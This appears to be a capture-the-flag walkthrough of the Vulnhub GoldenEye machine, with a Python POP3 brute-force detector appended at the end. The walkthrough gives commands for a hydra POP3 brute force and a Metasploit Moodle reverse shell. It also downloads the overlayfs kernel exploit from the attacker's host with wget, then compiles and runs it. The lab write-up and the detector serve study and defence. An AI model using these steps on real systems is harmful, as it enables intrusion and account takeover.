SfTian Vulnhub-Golden Eye

# Golden Eye

## Scanning the target for network information

```shell
sudo netdiscover -r 192.168.0.0/24
```

IP assigned by DHCP: 192.168.0.129

```shell
sudo masscan -p 0-65535 --rate=1000 192.168.0.129
```

Open ports: 25, 80, 55006, 55007

## Web

Opening the developer tools (F12) and reading the page's JavaScript shows a password stored as ASCII character codes; decoding it gives InvincibleHack3r. The JavaScript also mentions two names, boris and natalya, so both were tried.

400 authentication: boris / InvincibleHack3r

Once logged in, the page says mail has to be sent to the POP3 service.

Use hydra on Kali to brute-force the two known usernames, boris and natalya (written to username.txt here):

```shell
hydra -L username.txt -P /usr/share/wordlists/fasttrack.txt 192.168.0.129 -s 55007 pop3 -vV -t 64
```

```text
[55007][pop3] host: 192.168.0.129 login: boris password: secret1!
[55007][pop3] host: 192.168.0.129 login: natalya password: bird
```

With the POP3 credentials in hand:

```shell
nc 192.168.0.129 55007
user natalya
pass bird
list
# read the mail
retr 1
retr 2
```

Mail 1 mentions that a crime syndicate called Janus is hunting GoldenEye.

Mail 2 gives the credentials xenia / RCP90rulez! and the URL `severnaya-station.com/gnocertdir`, with a hint that the hostname has to be added to the hosts file.

```shell
nc 192.168.0.129 55007
user boris
pass secret1!
list
# read the mail
retr 1
retr 2
retr 3
```

In mail 2, natalya writes that boris's password can be brute-forced.

In mail 3, the boss tells Boris to hide the ciphertext in a file and delete the email.

## Configuring hosts

```text
192.168.0.129 severnaya-station.com
```

## Gathering information

Visiting `severnaya-station.com/gnocertdir` brings up the web interface; log in with the `xenia RCP90rulez!` credentials from the mail.

Digging around, the conversation with `Dr Doak` can be found under `Home->My profile->Message`.

Having obtained the mail username doak, continuing the hydra brute force gives:

```text
[55007][pop3] host: 192.168.0.129 login: Doak password: goat
```

Logging in to the mailbox via nc yields:

```
username: dr_doak
password: 4England!
```

Log in to the CMS; on the right-hand side of `Home-> My home`, find `My private files-> for james-> s3cret.txt`.

Visiting `http://severnaya-station.com/dir007key/for-007.jpg` returns an image. Its metadata contains a base64 string which, once decoded, is the admin password for the CMS.

## Reverse shell

The 2.2.3 in the top-left corner of the home page looks like the Moodle version number, which has a known CVE; use msfconsole to get a reverse shell.

[Moodle - Remote Command Execution](https://www.exploit-db.com/exploits/29324)

```shell
msfconsole
search moodle
use 1
set USERNAME admin
set PASSWORD xWinter1995x!
set RHOSTS severnaya-station.com
set LHOST 192.168.0.128
set LPORT 4444
set TARGETURI /gnocertdir
run
```

## Privilege escalation

[Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation - Linux local Exploit (exploit-db.com)](https://www.exploit-db.com/exploits/37292)

Searching for 37292 on Kali locates the corresponding exploit:

```shell
searchsploit 37292
```

Because the target only has cc, change gcc to cc on line 143 of the exploit, then fetch the exploit onto the target with wget, compile it and run it to escalate to root.

```shell
# on Kali
cp /usr/share/exploitdb/exploits/linux/local/37292.c /home/kali/temp
cd /home/kali/temp
python -m http.server 888

# in the msf session on the target
wget http://192.168.0.128:888/37292.c
cc 37292.c
./a.out
id
```
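As an added defensive counterpart to the hydra POP3 brute force in the Web section (example code, not part of the original write-up): a small Python detector that flags a brute force against a POP3 service in mail server logs and reports which accounts were logged into once the failures began. It assumes Dovecot-style `pop3-login` syslog lines; the log sample is constructed and uses documentation IP addresses, not the lab's.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed Dovecot-style pop3-login syslog format (an assumption, not taken from the target), e.g.
#   ... pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<boris>, method=PLAIN, rip=A, lip=B
LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) \S+ dovecot: pop3-login: "
    r"(?P<event>Login|Disconnected \(auth failed[^)]*\)): user=<(?P<user>[^>]*)>,.*?rip=(?P<rip>[\d.]+)"
)

def parse_line(line, year=2024):
    """Return (timestamp, success, user, source_ip), or None for lines that do not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["event"] == "Login", m["user"], m["rip"]

def detect_pop3_bruteforce(log_text, threshold=10, window_secs=60):
    """Flag source IPs with >= threshold failures in any window_secs span; list users tried and later successes."""
    events = sorted((e for e in map(parse_line, log_text.splitlines()) if e), key=lambda e: e[0])
    by_ip = defaultdict(list)
    for ev in events:
        by_ip[ev[3]].append(ev)
    alerts = {}
    for ip, evs in by_ip.items():
        fails = [e for e in evs if not e[1]]
        peak, j = 0, 0  # sliding window over the sorted failure timestamps
        for i in range(len(fails)):
            while fails[i][0] - fails[j][0] > timedelta(seconds=window_secs):
                j += 1
            peak = max(peak, i - j + 1)
        if peak >= threshold:
            alerts[ip] = {
                "peak_failures": peak,
                "users_tried": sorted({e[2] for e in fails}),
                "logins_after_failures": sorted({e[2] for e in evs if e[1] and e[0] >= fails[0][0]}),
            }
    return alerts

def sample_log():
    """Constructed sample: 12 failures in 12 s for boris/natalya from one host, then two logins from it, plus one unrelated failure."""
    fmt = "Jul 15 13:19:%02d mail dovecot: pop3-login: %s: user=<%s>, method=PLAIN, rip=%s, lip=192.0.2.10"
    fail, ok, attacker = "Disconnected (auth failed, 1 attempts in 2 secs)", "Login", "198.51.100.7"
    lines = [fmt % (i, fail, ("boris", "natalya")[i % 2], attacker) for i in range(1, 13)]
    lines += [fmt % (14, ok, "boris", attacker), fmt % (15, ok, "natalya", attacker)]
    lines.append(fmt % (20, fail, "doak", "203.0.113.4"))
    return "\n".join(lines)
```

Running `detect_pop3_bruteforce(sample_log())` flags only 198.51.100.7, with both boris and natalya listed under the logins that succeeded after the failure burst, which is the signal that a brute force actually recovered credentials.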